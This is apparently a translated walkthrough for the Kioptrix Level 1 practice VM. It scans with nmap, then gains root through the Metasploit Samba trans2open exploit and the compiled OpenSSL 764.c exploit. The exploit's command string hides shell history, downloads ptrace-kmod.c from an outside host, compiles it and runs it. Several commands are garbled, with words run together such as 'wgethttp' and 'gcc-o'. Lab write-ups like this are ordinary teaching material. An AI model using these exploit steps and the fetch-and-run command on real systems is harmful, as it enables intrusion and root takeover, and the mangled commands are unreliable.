Kioptrix Level1 penetration Solution

Objective: Kioptrix Level 1 [VMWare]
Local Environment: BackTrack5 RC3 [VMware] (192.168.74.145)
Gateway: 192.168.74.254
Tool used: nmap

#1: view the IP address of Kioptrix in the intranet.
Tool: nmap
Command: nmap 192.168.74.0/24-n-sP-sn

Obtain the IP address 192.168.74.147.

#2: View open ports.
Tool: nmap

Open Port:
22/tcp open ssh OpenSSH 2.9p2 (protocol 1.99)
80/tcp open http Apache httpd 1.3.20 (Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b)
111/tcp open rpcbind (rpcbind V2) 2 (rpc #100000)
139/tcp open netbios-ssn Samba smbd (workgroup: MYGROUP)
443/tcp open ssl/http Apache httpd 1.3.20 (Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b)
1024/tcp open status (status V1) 1 (rpc #100024)

Samba and Apache OpenSSL are found.
The following two solutions are available: Samba # 3-A, and Apache OpenSSL # 3-B.
# 3-A: Samba Overflow
Tool: metasploit
Command: msfconsole
Search first

Command: use exploit/linux/samba/trans2open

Command: set PAYLOAD linux/x86/shell_bind_tcp

Command: set rhost 192.168.74.147
Show options

After configuration, exploit ~

Command whoami
Return root
Overflow successful!
#3-B: Apache OpenSSL vulnerability overflow.
Tool: Nikto
Command: cd/pentest/web/nikto
./Nikto. pl-host 192.168.74.147-Display 124
The execution takes a long time. Wait patiently ~

Available information found:
Mod_ssl/2.8.4-mod_ssl 2.8.7 and lower are vulnerable to a remote buffer overflow which may allow a remote shell (difficult to exploit). CVE-2002-0082, OSVDB-756.

Open the Exploit-DB website and search for Apache Openssl

Download 764.c
Compilation. At this time, it is found that the compilation is not successful. Take a closer look at the missing information about rc4 and md5.
Add in header file
# Include <openssl/rc4.h>
# Include <openssl/md5.h>
 
The Exploit command is as follows: # define COMMAND2 "unset HISTFILE; cd/tmp; wgethttp: // packetstormsecurity. nl/0304-exploits/ptrace-kmod.c; gcc-o p ptrace-kmod.c; rm ptrace-kmod.c ;. /p; \ n"
Wget http://packetstormsecurity.nl/0304-exploits/ptrace-kmod.c required
Or download one by yourself. The local machine acts as a server, and wget from the Intranet.
Change this line to # define COMMAND2 "unset HISTFILE; cd/tmp; wget 192.168.74.145/ptrace-kmod.c; gcc-o p ptrace-kmod.c; rm ptrace-kmod.c;./p; \ n"

Download a ptrace-kmod.c
Copy to/var/www/directory
Enable the Apache service

Compilation Method in the comments gcc-o OpenFuck. c-lcrypto
Command: gcc-o OpenFuck 764.c-lcrypto
Run./OpenFuck to see the prompt.
 
0x6b-RedHat Linux 7.2 (apache-1.3.20-16) 2
Command:./OpenFuck 0x6b 192.168.74.147

Command whoami
Return root
Overflow successful!
#4: execute mail to view emails
Command: mail
1
 
Success ~

This is the first time ..
Refer to the linux520 tutorial and springemp tutorial.